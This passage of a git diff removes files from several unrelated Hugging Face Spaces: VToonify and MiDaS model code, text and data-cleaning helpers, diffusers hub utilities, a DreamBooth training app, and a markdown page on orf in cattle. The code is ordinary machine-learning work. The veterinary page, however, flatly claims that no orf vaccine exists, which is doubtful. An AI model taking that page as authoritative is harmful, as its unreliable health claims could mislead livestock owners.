width - ) - stddev = torch.sqrt(stddev.var(0, unbiased=False) + 1e-8) - stddev = stddev.mean([2, 3, 4], keepdims=True).squeeze(2) - stddev = stddev.repeat(group, 1, height, width) - out = torch.cat([out, stddev], 1) - - out = self.final_conv(out) - out = out.view(batch, -1) - - if self.use_condition: - h = self.final_linear(out) - condition = torch.cat((self.label_mapper(degree_label), self.style_mapper(style_ind)), dim=1) - out = (h * 
condition).sum(dim=1, keepdim=True) * (1 / np.sqrt(self.condition_dim)) - else: - out = self.final_linear(out) - - return out - - -class VToonifyResBlock(nn.Module): - def __init__(self, fin): - super().__init__() - - self.conv = nn.Conv2d(fin, fin, 3, 1, 1) - self.conv2 = nn.Conv2d(fin, fin, 3, 1, 1) - self.lrelu = nn.LeakyReLU(negative_slope=0.2, inplace=True) - - def forward(self, x): - out = self.lrelu(self.conv(x)) - out = self.lrelu(self.conv2(out)) - out = (out + x) / math.sqrt(2) - return out - -class Fusion(nn.Module): - def __init__(self, in_channels, skip_channels, out_channels): - super().__init__() - - # create conv layers - self.conv = nn.Conv2d(in_channels + skip_channels, out_channels, 3, 1, 1, bias=True) - self.norm = AdaptiveInstanceNorm(in_channels + skip_channels, 128) - self.conv2 = nn.Conv2d(in_channels + skip_channels, 1, 3, 1, 1, bias=True) - #''' - self.linear = nn.Sequential( - nn.Linear(1, 64), - nn.LeakyReLU(negative_slope=0.2, inplace=True), - nn.Linear(64, 128), - nn.LeakyReLU(negative_slope=0.2, inplace=True) - ) - - def forward(self, f_G, f_E, d_s=1): - # label of style degree - label = self.linear(torch.zeros(f_G.size(0),1).to(f_G.device) + d_s) - out = torch.cat([f_G, abs(f_G-f_E)], dim=1) - m_E = (F.relu(self.conv2(self.norm(out, label)))).tanh() - f_out = self.conv(torch.cat([f_G, f_E * m_E], dim=1)) - return f_out, m_E - -class VToonify(nn.Module): - def __init__(self, - in_size=256, - out_size=1024, - img_channels=3, - style_channels=512, - num_mlps=8, - channel_multiplier=2, - num_res_layers=6, - backbone = 'dualstylegan', - ): - - super().__init__() - - self.backbone = backbone - if self.backbone == 'dualstylegan': - # DualStyleGAN, with weights being fixed - self.generator = DualStyleGAN(out_size, style_channels, num_mlps, channel_multiplier) - else: - # StyleGANv2, with weights being fixed - self.generator = Generator(out_size, style_channels, num_mlps, channel_multiplier) - - self.in_size = in_size - self.style_channels = style_channels - channels = self.generator.channels - - # encoder - num_styles = int(np.log2(out_size)) * 2 - 2 - encoder_res = [2**i for i in range(int(np.log2(in_size)), 4, -1)] - self.encoder = nn.ModuleList() - self.encoder.append( - nn.Sequential( - nn.Conv2d(img_channels+19, 32, 3, 1, 1, bias=True), - nn.LeakyReLU(negative_slope=0.2, inplace=True), - nn.Conv2d(32, channels[in_size], 3, 1, 1, bias=True), - nn.LeakyReLU(negative_slope=0.2, inplace=True))) - - for res in encoder_res: - in_channels = channels[res] - if res > 32: - out_channels = channels[res // 2] - block = nn.Sequential( - nn.Conv2d(in_channels, out_channels, 3, 2, 1, bias=True), - nn.LeakyReLU(negative_slope=0.2, inplace=True), - nn.Conv2d(out_channels, out_channels, 3, 1, 1, bias=True), - nn.LeakyReLU(negative_slope=0.2, inplace=True)) - self.encoder.append(block) - else: - layers = [] - for _ in range(num_res_layers): - layers.append(VToonifyResBlock(in_channels)) - self.encoder.append(nn.Sequential(*layers)) - block = nn.Conv2d(in_channels, img_channels, 1, 1, 0, bias=True) - self.encoder.append(block) - - # trainable fusion module - self.fusion_out = nn.ModuleList() - self.fusion_skip = nn.ModuleList() - for res in encoder_res[::-1]: - num_channels = channels[res] - if self.backbone == 'dualstylegan': - self.fusion_out.append( - Fusion(num_channels, num_channels, num_channels)) - else: - self.fusion_out.append( - nn.Conv2d(num_channels * 2, num_channels, 3, 1, 1, bias=True)) - - self.fusion_skip.append( - nn.Conv2d(num_channels + 3, 3, 3, 1, 1, 
bias=True)) - - # Modified ModRes blocks in DualStyleGAN, with weights being fixed - if self.backbone == 'dualstylegan': - self.res = nn.ModuleList() - self.res.append(AdaResBlock(self.generator.channels[2 ** 2])) # for conv1, no use in this model - for i in range(3, 6): - out_channel = self.generator.channels[2 ** i] - self.res.append(AdaResBlock(out_channel, dilation=2**(5-i))) - self.res.append(AdaResBlock(out_channel, dilation=2**(5-i))) - - - def forward(self, x, style, d_s=None, return_mask=False, return_feat=False): - # map style to W+ space - if style is not None and style.ndim < 3: - if self.backbone == 'dualstylegan': - resstyles = self.generator.style(style).unsqueeze(1).repeat(1, self.generator.n_latent, 1) - adastyles = style.unsqueeze(1).repeat(1, self.generator.n_latent, 1) - elif style is not None: - nB, nL, nD = style.shape - if self.backbone == 'dualstylegan': - resstyles = self.generator.style(style.reshape(nB*nL, nD)).reshape(nB, nL, nD) - adastyles = style - if self.backbone == 'dualstylegan': - adastyles = adastyles.clone() - for i in range(7, self.generator.n_latent): - adastyles[:, i] = self.generator.res[i](adastyles[:, i]) - - # obtain multi-scale content features - feat = x - encoder_features = [] - # downsampling conv parts of E - for block in self.encoder[:-2]: - feat = block(feat) - encoder_features.append(feat) - encoder_features = encoder_features[::-1] - # Resblocks in E - for ii, block in enumerate(self.encoder[-2]): - feat = block(feat) - # adjust Resblocks with ModRes blocks - if self.backbone == 'dualstylegan': - feat = self.res[ii+1](feat, resstyles[:, ii+1], d_s) - # the last-layer feature of E (inputs of backbone) - out = feat - skip = self.encoder[-1](feat) - if return_feat: - return out, skip - - # 32x32 ---> higher res - _index = 1 - m_Es = [] - for conv1, conv2, to_rgb in zip( - self.stylegan().convs[6::2], self.stylegan().convs[7::2], self.stylegan().to_rgbs[3:]): - - # pass the mid-layer features of E to the corresponding resolution layers of G - if 2 ** (5+((_index-1)//2)) <= self.in_size: - fusion_index = (_index - 1) // 2 - f_E = encoder_features[fusion_index] - - if self.backbone == 'dualstylegan': - out, m_E = self.fusion_out[fusion_index](out, f_E, d_s) - skip = self.fusion_skip[fusion_index](torch.cat([skip, f_E*m_E], dim=1)) - m_Es += [m_E] - else: - out = self.fusion_out[fusion_index](torch.cat([out, f_E], dim=1)) - skip = self.fusion_skip[fusion_index](torch.cat([skip, f_E], dim=1)) - - # remove the noise input - batch, _, height, width = out.shape - noise = x.new_empty(batch, 1, height * 2, width * 2).normal_().detach() * 0.0 - - out = conv1(out, adastyles[:, _index+6], noise=noise) - out = conv2(out, adastyles[:, _index+7], noise=noise) - skip = to_rgb(out, adastyles[:, _index+8], skip) - _index += 2 - - image = skip - if return_mask and self.backbone == 'dualstylegan': - return image, m_Es - return image - - def stylegan(self): - if self.backbone == 'dualstylegan': - return self.generator.generator - else: - return self.generator - - def zplus2wplus(self, zplus): - return self.stylegan().style(zplus.reshape(zplus.shape[0]*zplus.shape[1], zplus.shape[2])).reshape(zplus.shape) \ No newline at end of file diff --git a/spaces/SERER/VITS-Umamusume-voice-synthesizer/text/__init__.py b/spaces/SERER/VITS-Umamusume-voice-synthesizer/text/__init__.py deleted file mode 100644 index 4e69c354dd24e3243980236eca962cd5945a92fc..0000000000000000000000000000000000000000 --- a/spaces/SERER/VITS-Umamusume-voice-synthesizer/text/__init__.py +++ 
/dev/null @@ -1,32 +0,0 @@ -""" from https://github.com/keithito/tacotron """ -from text import cleaners - - -def text_to_sequence(text, symbols, cleaner_names): - '''Converts a string of text to a sequence of IDs corresponding to the symbols in the text. - Args: - text: string to convert to a sequence - cleaner_names: names of the cleaner functions to run the text through - Returns: - List of integers corresponding to the symbols in the text - ''' - _symbol_to_id = {s: i for i, s in enumerate(symbols)} - - sequence = [] - - clean_text = _clean_text(text, cleaner_names) - for symbol in clean_text: - if symbol not in _symbol_to_id.keys(): - continue - symbol_id = _symbol_to_id[symbol] - sequence += [symbol_id] - return sequence - - -def _clean_text(text, cleaner_names): - for name in cleaner_names: - cleaner = getattr(cleaners, name) - if not cleaner: - raise Exception('Unknown cleaner: %s' % name) - text = cleaner(text) - return text diff --git a/spaces/SHSH0819/event_detection_app/event_detection_dataclean.py b/spaces/SHSH0819/event_detection_app/event_detection_dataclean.py deleted file mode 100644 index 70012498b4d11848e472dbacf17063379dbd7782..0000000000000000000000000000000000000000 --- a/spaces/SHSH0819/event_detection_app/event_detection_dataclean.py +++ /dev/null @@ -1,118 +0,0 @@ -import re -import json -from collections import Counter - - -def load_texttag_file(texttag_filename): - try: - with open(texttag_filename, "r") as data_file: - data_all = data_file.read() - tags_all = list() - texts_selected = list() - tags_selected = list() - - for line in re.split(r'\n\t?\n', data_all): - if len(line) != 0: - texts_line = list() - tags_line = list() - for item in line.split("\n"): - if len(item)!=0: - text, tag = item.split("\t") - if re.search(r"[@|?|!+?|:|(|)]|\\|\.*?\|-|/|/|/.*?/|http\S+|www\S+", text) == None: - texts_line.append(text.lower()) - tags_line.append(tag) - tags_all.append(tag) - - texts_selected.append(texts_line) - tags_selected.append(tags_line) - except FileNotFoundError as error: - msg = "Sorry, the file" + data_file + "does not exist." 
- print(msg) - print("error:" + error) - - return texts_selected, tags_selected, tags_all - - -def tag_ids_map(tags_all, tags2ids_name, ids2tags_name): - tags = list(set(tags_all)) - tags.sort() - unique_tags = len(tags) - ids = [i for i in range(unique_tags)] - - tags2ids = dict(zip(tags, ids)) - ids2tags = dict(zip(ids, tags)) - - with open(tags2ids_name, "w") as filename: - json.dump(tags2ids, filename) - - with open(ids2tags_name, "w") as filename: - json.dump(ids2tags, filename) - - return tags2ids, ids2tags - - -def add_tagids(tags_selected, tags2ids, ids2tags): - tagids_selected = list() - for tags_line in tags_selected: - tagids_line = list() - for tag in tags_line: - tagids_line.append(tags2ids[tag]) - tagids_selected.append(tagids_line) - # print(tagids_selected) - return tagids_selected - - -def add_text_tagid(tags_selected, tags2ids, ids2tags): - tags_chunk = list() - tagids_chunk = list() - for tags_line in tags_selected: - tag_line_chunk = list() - tagid_line_chunk = list() - tag_line_count = Counter(tags_line) - if len(tag_line_count) == 1: - tag_line_chunk.append(max(tag_line_count)) - tagid_line_chunk.append(tags2ids[max(tag_line_count)]) - else: - del tag_line_count["O"] - tag_line_chunk.append(max(tag_line_count)) - tagid_line_chunk.append(tags2ids[max(tag_line_count)]) - - tags_chunk.append(tag_line_chunk) - tagids_chunk.append(tagid_line_chunk) - - return tags_chunk, tagids_chunk - -def save_json(json_filename, texts_selected, tags_selected, tagids_selected, tags_chunk, tagids_chunk): - total_length = len(texts_selected) - save_datalist = list() - total_length = 32 - for index in range(total_length): - item_dict = dict() - item_dict["text"] = texts_selected[index] - item_dict["word_tag"] = tags_selected[index] - item_dict["word_tag_id"] = tagids_selected[index] - item_dict["text_tag"] = tags_chunk[index] - item_dict["text_tag_id"] = tagids_chunk[index] - save_datalist.append(item_dict) - - with open(json_filename, 'w') as file: - json.dump(save_datalist, file) - - return - -def main(data_filename, json_filename, tags2ids_name, ids2tags_name): - texts_selected, tags_selected, tags_all = load_texttag_file(data_filename) - tags2ids, ids2tags = tag_ids_map(tags_all, tags2ids_name, ids2tags_name) - - tagids_selected = add_tagids(tags_selected, tags2ids, ids2tags) - tags_chunk, tagids_chunk = add_text_tagid(tags_selected, tags2ids, ids2tags) - - save_json(json_filename, texts_selected, tags_selected, tagids_selected, tags_chunk, tagids_chunk) - - -if __name__ == "__main__": - test_raw = "../data/raw_EDT/Event_detection/dev.txt" - test_save = '../data/raw_EDT/Event_detection/dev.json' - tags2ids_name = "../data/raw_EDT/Event_detection/tags2ids.json" - ids2tags_name = "../data/raw_EDT/Event_detection/ids2tags.json" - main(test_raw, test_save, tags2ids_name, ids2tags_name) \ No newline at end of file diff --git a/spaces/SHULGIN/MiDaS/app.py b/spaces/SHULGIN/MiDaS/app.py deleted file mode 100644 index f113fabac69b22df63691569fefdb7e2f29c0849..0000000000000000000000000000000000000000 --- a/spaces/SHULGIN/MiDaS/app.py +++ /dev/null @@ -1,63 +0,0 @@ -import cv2 -import torch -import gradio as gr -import numpy as np -from PIL import Image - -torch.hub.download_url_to_file('https://images.unsplash.com/photo-1437622368342-7a3d73a34c8f', 'turtle.jpg') -torch.hub.download_url_to_file('https://images.unsplash.com/photo-1519066629447-267fffa62d4b', 'lions.jpg') - -midas = torch.hub.load("intel-isl/MiDaS", "MiDaS") - -use_large_model = True - -if use_large_model: - midas = 
torch.hub.load("intel-isl/MiDaS", "MiDaS") -else: - midas = torch.hub.load("intel-isl/MiDaS", "MiDaS_small") - -device = "cpu" -midas.to(device) - -midas_transforms = torch.hub.load("intel-isl/MiDaS", "transforms") - -if use_large_model: - transform = midas_transforms.default_transform -else: - transform = midas_transforms.small_transform - - -def depth(img): - cv_image = np.array(img) - img = cv2.cvtColor(cv_image, cv2.COLOR_BGR2RGB) - - input_batch = transform(img).to(device) - with torch.no_grad(): - prediction = midas(input_batch) - - prediction = torch.nn.functional.interpolate( - prediction.unsqueeze(1), - size=img.shape[:2], - mode="bicubic", - align_corners=False, - ).squeeze() - - output = prediction.cpu().numpy() - formatted = (output * 255 / np.max(output)).astype('uint8') - img = Image.fromarray(formatted) - return img - - -inputs = gr.inputs.Image(type='pil', label="Original Image") -outputs = gr.outputs.Image(type="pil",label="Output Image") - -title = "MiDaS" -description = "Gradio demo for MiDaS v2.1 which takes in a single image for computing relative depth. To use it, simply upload your image, or click one of the examples to load them. Read more at the links below." -article = "

    - Towards Robust Monocular Depth Estimation: Mixing Datasets for Zero-shot Cross-dataset Transfer | Github Repo
    " - -examples = [ - ["turtle.jpg"], - ["lions.jpg"] -] - -gr.Interface(depth, inputs, outputs, title=title, description=description, article=article, examples=examples, analytics_enabled=False).launch(enable_queue=True,cache_examples=True) \ No newline at end of file diff --git a/spaces/Salesforce/EDICT/my_diffusers/hub_utils.py b/spaces/Salesforce/EDICT/my_diffusers/hub_utils.py deleted file mode 100644 index c07329e36fe7a8826b0f1fb22396819b220e1b58..0000000000000000000000000000000000000000 --- a/spaces/Salesforce/EDICT/my_diffusers/hub_utils.py +++ /dev/null @@ -1,197 +0,0 @@ -# coding=utf-8 -# Copyright 2022 The HuggingFace Inc. team. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - - -import os -import shutil -from pathlib import Path -from typing import Optional - -from huggingface_hub import HfFolder, Repository, whoami - -from .pipeline_utils import DiffusionPipeline -from .utils import is_modelcards_available, logging - - -if is_modelcards_available(): - from modelcards import CardData, ModelCard - - -logger = logging.get_logger(__name__) - - -MODEL_CARD_TEMPLATE_PATH = Path(__file__).parent / "utils" / "model_card_template.md" - - -def get_full_repo_name(model_id: str, organization: Optional[str] = None, token: Optional[str] = None): - if token is None: - token = HfFolder.get_token() - if organization is None: - username = whoami(token)["name"] - return f"{username}/{model_id}" - else: - return f"{organization}/{model_id}" - - -def init_git_repo(args, at_init: bool = False): - """ - Args: - Initializes a git repo in `args.hub_model_id`. - at_init (`bool`, *optional*, defaults to `False`): - Whether this function is called before any training or not. If `self.args.overwrite_output_dir` is `True` - and `at_init` is `True`, the path to the repo (which is `self.args.output_dir`) might be wiped out. 
- """ - if hasattr(args, "local_rank") and args.local_rank not in [-1, 0]: - return - hub_token = args.hub_token if hasattr(args, "hub_token") else None - use_auth_token = True if hub_token is None else hub_token - if not hasattr(args, "hub_model_id") or args.hub_model_id is None: - repo_name = Path(args.output_dir).absolute().name - else: - repo_name = args.hub_model_id - if "/" not in repo_name: - repo_name = get_full_repo_name(repo_name, token=hub_token) - - try: - repo = Repository( - args.output_dir, - clone_from=repo_name, - use_auth_token=use_auth_token, - private=args.hub_private_repo, - ) - except EnvironmentError: - if args.overwrite_output_dir and at_init: - # Try again after wiping output_dir - shutil.rmtree(args.output_dir) - repo = Repository( - args.output_dir, - clone_from=repo_name, - use_auth_token=use_auth_token, - ) - else: - raise - - repo.git_pull() - - # By default, ignore the checkpoint folders - if not os.path.exists(os.path.join(args.output_dir, ".gitignore")): - with open(os.path.join(args.output_dir, ".gitignore"), "w", encoding="utf-8") as writer: - writer.writelines(["checkpoint-*/"]) - - return repo - - -def push_to_hub( - args, - pipeline: DiffusionPipeline, - repo: Repository, - commit_message: Optional[str] = "End of training", - blocking: bool = True, - **kwargs, -) -> str: - """ - Parameters: - Upload *self.model* and *self.tokenizer* to the 🤗 model hub on the repo *self.args.hub_model_id*. - commit_message (`str`, *optional*, defaults to `"End of training"`): - Message to commit while pushing. - blocking (`bool`, *optional*, defaults to `True`): - Whether the function should return only when the `git push` has finished. - kwargs: - Additional keyword arguments passed along to [`create_model_card`]. - Returns: - The url of the commit of your model in the given repository if `blocking=False`, a tuple with the url of the - commit and an object to track the progress of the commit if `blocking=True` - """ - - if not hasattr(args, "hub_model_id") or args.hub_model_id is None: - model_name = Path(args.output_dir).name - else: - model_name = args.hub_model_id.split("/")[-1] - - output_dir = args.output_dir - os.makedirs(output_dir, exist_ok=True) - logger.info(f"Saving pipeline checkpoint to {output_dir}") - pipeline.save_pretrained(output_dir) - - # Only push from one node. - if hasattr(args, "local_rank") and args.local_rank not in [-1, 0]: - return - - # Cancel any async push in progress if blocking=True. The commits will all be pushed together. - if ( - blocking - and len(repo.command_queue) > 0 - and repo.command_queue[-1] is not None - and not repo.command_queue[-1].is_done - ): - repo.command_queue[-1]._process.kill() - - git_head_commit_url = repo.push_to_hub(commit_message=commit_message, blocking=blocking, auto_lfs_prune=True) - # push separately the model card to be independent from the rest of the model - create_model_card(args, model_name=model_name) - try: - repo.push_to_hub(commit_message="update model card README.md", blocking=blocking, auto_lfs_prune=True) - except EnvironmentError as exc: - logger.error(f"Error pushing update to the model card. Please read logs and retry.\n${exc}") - - return git_head_commit_url - - -def create_model_card(args, model_name): - if not is_modelcards_available: - raise ValueError( - "Please make sure to have `modelcards` installed when using the `create_model_card` function. You can" - " install the package with `pip install modelcards`." 
- ) - - if hasattr(args, "local_rank") and args.local_rank not in [-1, 0]: - return - - hub_token = args.hub_token if hasattr(args, "hub_token") else None - repo_name = get_full_repo_name(model_name, token=hub_token) - - model_card = ModelCard.from_template( - card_data=CardData( # Card metadata object that will be converted to YAML block - language="en", - license="apache-2.0", - library_name="diffusers", - tags=[], - datasets=args.dataset_name, - metrics=[], - ), - template_path=MODEL_CARD_TEMPLATE_PATH, - model_name=model_name, - repo_name=repo_name, - dataset_name=args.dataset_name if hasattr(args, "dataset_name") else None, - learning_rate=args.learning_rate, - train_batch_size=args.train_batch_size, - eval_batch_size=args.eval_batch_size, - gradient_accumulation_steps=args.gradient_accumulation_steps - if hasattr(args, "gradient_accumulation_steps") - else None, - adam_beta1=args.adam_beta1 if hasattr(args, "adam_beta1") else None, - adam_beta2=args.adam_beta2 if hasattr(args, "adam_beta2") else None, - adam_weight_decay=args.adam_weight_decay if hasattr(args, "adam_weight_decay") else None, - adam_epsilon=args.adam_epsilon if hasattr(args, "adam_epsilon") else None, - lr_scheduler=args.lr_scheduler if hasattr(args, "lr_scheduler") else None, - lr_warmup_steps=args.lr_warmup_steps if hasattr(args, "lr_warmup_steps") else None, - ema_inv_gamma=args.ema_inv_gamma if hasattr(args, "ema_inv_gamma") else None, - ema_power=args.ema_power if hasattr(args, "ema_power") else None, - ema_max_decay=args.ema_max_decay if hasattr(args, "ema_max_decay") else None, - mixed_precision=args.mixed_precision, - ) - - card_path = os.path.join(args.output_dir, "README.md") - model_card.save(card_path) diff --git a/spaces/SarthakSidhant/Go-Cattle/diseases/contagious ecthyma (orf).md b/spaces/SarthakSidhant/Go-Cattle/diseases/contagious ecthyma (orf).md deleted file mode 100644 index 13d67dbcc79c9908c63c8103443b48f6852a4c9d..0000000000000000000000000000000000000000 --- a/spaces/SarthakSidhant/Go-Cattle/diseases/contagious ecthyma (orf).md +++ /dev/null @@ -1,39 +0,0 @@ -## Contagious ecthyma (orf) - -**Information** : Contagious ecthyma (orf) is a highly contagious viral disease of cattle that causes raised, crusty lesions on the skin. The virus is spread through direct contact with infected animals or their secretions. -[Image of Contagious ecthyma (orf) in cattle] - -**Symptoms** - -The symptoms of contagious ecthyma typically appear within 2-5 days of infection and include: - -* Raised, crusty lesions on the lips, tongue, muzzle, teats, and coronary bands of the hooves -* Painful eating and drinking -* Drooling -* Fever -* Swelling of the lymph nodes in the head and neck - -**Remedies** - -There is no specific treatment for contagious ecthyma. Treatment is usually supportive and may include: - -* Providing pain relief -* Administering fluids and electrolytes -* Treating secondary bacterial infections - -**Causes** - -Contagious ecthyma (orf) is caused by the orf virus, which is a member of the poxvirus family. The virus is spread through direct contact with infected animals or their secretions. The virus can also be spread through contact with contaminated objects, such as feed, water, or equipment. - -**Prevention** - -There is no vaccine available for contagious ecthyma. 
However, there are a number of preventive measures that can be taken to reduce the risk of infection, such as: - -* Practicing good biosecurity measures -* Isolating infected animals from healthy animals -* Cleaning and disinfecting contaminated areas -* Vaccinating cattle against other diseases that can weaken the immune system, such as bovine viral diarrhea virus (BVDV) and rotavirus - -**Differential diagnosis** - -Contagious ecthyma can be difficult to distinguish from other diseases that cause mouth lesions, such as foot-and-mouth disease, bovine papular stomatitis, and vesicular stomatitis. A veterinarian can diagnose contagious ecthyma by testing a sample of the lesions for the presence of the orf virus. diff --git a/spaces/Senpaisora6/dreambooth-training/app.py b/spaces/Senpaisora6/dreambooth-training/app.py deleted file mode 100644 index 25728e55803278642ca68a4f8da27d72745667aa..0000000000000000000000000000000000000000 --- a/spaces/Senpaisora6/dreambooth-training/app.py +++ /dev/null @@ -1,340 +0,0 @@ -import gradio as gr -import os -from pathlib import Path -import argparse -import shutil -from train_dreambooth import run_training -from convertosd import convert -from PIL import Image -from slugify import slugify -import requests -import torch -import zipfile -from diffusers import StableDiffusionPipeline - -css = ''' - .instruction{position: absolute; top: 0;right: 0;margin-top: 0px !important} - .arrow{position: absolute;top: 0;right: -110px;margin-top: -8px !important} - #component-4, #component-3, #component-10{min-height: 0} -''' -model_to_load = "multimodalart/sd-fine-tunable" -maximum_concepts = 3 -#Pre download the files even if we don't use it here -StableDiffusionPipeline.from_pretrained(model_to_load) - -def zipdir(path, ziph): - # ziph is zipfile handle - for root, dirs, files in os.walk(path): - for file in files: - ziph.write(os.path.join(root, file), - os.path.relpath(os.path.join(root, file), - os.path.join(path, '..'))) - -def swap_text(option): - mandatory_liability = "You must have the right to do so and you are liable for the images you use, example:" - if(option == "object"): - instance_prompt_example = "cttoy" - freeze_for = 50 - return [f"You are going to train `object`(s), upload 5-10 images of each object you are planning on training on from different angles/perspectives. {mandatory_liability}:", '''''', f"You should name your concept with a unique made up word that has low chance of the model already knowing it (e.g.: `{instance_prompt_example}` here). Images will be automatically cropped to 512x512.", freeze_for] - elif(option == "person"): - instance_prompt_example = "julcto" - freeze_for = 100 - return [f"You are going to train a `person`(s), upload 10-20 images of each person you are planning on training on from different angles/perspectives. {mandatory_liability}:", '''''', f"You should name the files with a unique word that represent your concept (e.g.: `{instance_prompt_example}` here). Images will be automatically cropped to 512x512.", freeze_for] - elif(option == "style"): - instance_prompt_example = "trsldamrl" - freeze_for = 10 - return [f"You are going to train a `style`, upload 10-20 images of the style you are planning on training on. Name the files with the words you would like {mandatory_liability}:", '''''', f"You should name your files with a unique word that represent your concept (e.g.: `{instance_prompt_example}` here). 
Images will be automatically cropped to 512x512.", freeze_for] - -def count_files(*inputs): - file_counter = 0 - concept_counter = 0 - for i, input in enumerate(inputs): - if(i < maximum_concepts-1): - files = inputs[i] - if(files): - concept_counter+=1 - file_counter+=len(files) - uses_custom = inputs[-1] - type_of_thing = inputs[-4] - if(uses_custom): - Training_Steps = int(inputs[-3]) - else: - if(type_of_thing == "person"): - Training_Steps = file_counter*200*2 - else: - Training_Steps = file_counter*200 - return(gr.update(visible=True, value=f"You are going to train {concept_counter} {type_of_thing}(s), with {file_counter} images for {Training_Steps} steps. This should take around {round(Training_Steps/1.5, 2)} seconds, or {round((Training_Steps/1.5)/3600, 2)} hours. As a reminder, the T4 GPU costs US$0.60 for 1h. Once training is over, don't forget to swap the hardware back to CPU.")) - -def train(*inputs): - if "IS_SHARED_UI" in os.environ: - raise gr.Error("This Space only works in duplicated instances") - if os.path.exists("output_model"): shutil.rmtree('output_model') - if os.path.exists("instance_images"): shutil.rmtree('instance_images') - if os.path.exists("diffusers_model.zip"): os.remove("diffusers_model.zip") - if os.path.exists("model.ckpt"): os.remove("model.ckpt") - file_counter = 0 - for i, input in enumerate(inputs): - if(i < maximum_concepts-1): - if(input): - os.makedirs('instance_images',exist_ok=True) - files = inputs[i+(maximum_concepts*2)] - prompt = inputs[i+maximum_concepts] - if(prompt == "" or prompt == None): - raise gr.Error("You forgot to define your concept prompt") - for j, file_temp in enumerate(files): - file = Image.open(file_temp.name) - width, height = file.size - side_length = min(width, height) - left = (width - side_length)/2 - top = (height - side_length)/2 - right = (width + side_length)/2 - bottom = (height + side_length)/2 - image = file.crop((left, top, right, bottom)) - image = image.resize((512, 512)) - extension = file_temp.name.split(".")[1] - image = image.convert('RGB') - image.save(f'instance_images/{prompt}_({j+1}).jpg', format="JPEG", quality = 100) - file_counter += 1 - - os.makedirs('output_model',exist_ok=True) - uses_custom = inputs[-1] - type_of_thing = inputs[-4] - if(uses_custom): - Training_Steps = int(inputs[-3]) - Train_text_encoder_for = int(inputs[-2]) - else: - Training_Steps = file_counter*200 - if(type_of_thing == "object"): - Train_text_encoder_for=30 - elif(type_of_thing == "person"): - Train_text_encoder_for=60 - elif(type_of_thing == "style"): - Train_text_encoder_for=15 - - class_data_dir = None - stptxt = int((Training_Steps*Train_text_encoder_for)/100) - args_general = argparse.Namespace( - image_captions_filename = True, - train_text_encoder = True, - stop_text_encoder_training = stptxt, - save_n_steps = 0, - pretrained_model_name_or_path = model_to_load, - instance_data_dir="instance_images", - class_data_dir=class_data_dir, - output_dir="output_model", - instance_prompt="", - seed=42, - resolution=512, - mixed_precision="fp16", - train_batch_size=1, - gradient_accumulation_steps=1, - use_8bit_adam=True, - learning_rate=2e-6, - lr_scheduler="polynomial", - lr_warmup_steps = 0, - max_train_steps=Training_Steps, - ) - run_training(args_general) - torch.cuda.empty_cache() - #convert("output_model", "model.ckpt") - #shutil.rmtree('instance_images') - #shutil.make_archive("diffusers_model", 'zip', "output_model") - with zipfile.ZipFile('diffusers_model.zip', 'w', zipfile.ZIP_DEFLATED) as zipf: - 
zipdir('output_model/', zipf) - torch.cuda.empty_cache() - return [gr.update(visible=True, value=["diffusers_model.zip"]), gr.update(visible=True), gr.update(visible=True), gr.update(visible=True)] - -def generate(prompt): - from diffusers import StableDiffusionPipeline - - pipe = StableDiffusionPipeline.from_pretrained("./output_model", torch_dtype=torch.float16) - pipe = pipe.to("cuda") - image = pipe(prompt).images[0] - return(image) - -def push(model_name, where_to_upload, hf_token): - if(not os.path.exists("model.ckpt")): - convert("output_model", "model.ckpt") - from huggingface_hub import HfApi, HfFolder, CommitOperationAdd - from huggingface_hub import create_repo - model_name_slug = slugify(model_name) - if(where_to_upload == "My personal profile"): - api = HfApi() - your_username = api.whoami(token=hf_token)["name"] - model_id = f"{your_username}/{model_name_slug}" - else: - model_id = f"sd-dreambooth-library/{model_name_slug}" - headers = {"Authorization" : f"Bearer: {hf_token}", "Content-Type": "application/json"} - response = requests.post("https://huggingface.co/organizations/sd-dreambooth-library/share/SSeOwppVCscfTEzFGQaqpfcjukVeNrKNHX", headers=headers) - - images_upload = os.listdir("instance_images") - image_string = "" - instance_prompt_list = [] - previous_instance_prompt = '' - for i, image in enumerate(images_upload): - instance_prompt = image.split("_")[0] - if(instance_prompt != previous_instance_prompt): - title_instance_prompt_string = instance_prompt - instance_prompt_list.append(instance_prompt) - else: - title_instance_prompt_string = '' - previous_instance_prompt = instance_prompt - image_string = f'''{title_instance_prompt_string} -{image_string}![{instance_prompt} {i}](https://huggingface.co/{model_id}/resolve/main/sample_images/{image})''' - readme_text = f'''--- -license: creativeml-openrail-m -tags: -- text-to-image ---- -### {model_name} Dreambooth model trained by {api.whoami(token=hf_token)["name"]} with [Hugging Face Dreambooth Training Space](https://huggingface.co/spaces/multimodalart/dreambooth-training) - -You run your new concept via `diffusers` [Colab Notebook for Inference](https://colab.research.google.com/github/huggingface/notebooks/blob/main/diffusers/sd_dreambooth_inference.ipynb) - -Sample pictures of this concept: -{image_string} -''' - #Save the readme to a file - readme_file = open("README.md", "w") - readme_file.write(readme_text) - readme_file.close() - #Save the token identifier to a file - text_file = open("token_identifier.txt", "w") - text_file.write(', '.join(instance_prompt_list)) - text_file.close() - create_repo(model_id,private=True, token=hf_token) - operations = [ - CommitOperationAdd(path_in_repo="token_identifier.txt", path_or_fileobj="token_identifier.txt"), - CommitOperationAdd(path_in_repo="README.md", path_or_fileobj="README.md"), - CommitOperationAdd(path_in_repo=f"model.ckpt",path_or_fileobj="model.ckpt") - ] - api.create_commit( - repo_id=model_id, - operations=operations, - commit_message=f"Upload the model {model_name}", - token=hf_token - ) - api.upload_folder( - folder_path="output_model", - repo_id=model_id, - token=hf_token - ) - api.upload_folder( - folder_path="instance_images", - path_in_repo="concept_images", - repo_id=model_id, - token=hf_token - ) - return [gr.update(visible=True, value=f"Successfully uploaded your model. 
Access it [here](https://huggingface.co/{model_id})"), gr.update(visible=True, value=["diffusers_model.zip", "model.ckpt"])] - -def convert_to_ckpt(): - convert("output_model", "model.ckpt") - return gr.update(visible=True, value=["diffusers_model.zip", "model.ckpt"]) - -with gr.Blocks(css=css) as demo: - with gr.Box(): - if "IS_SHARED_UI" in os.environ: - gr.HTML(''' -
    - Attention - This Space doesn't work in this shared UI
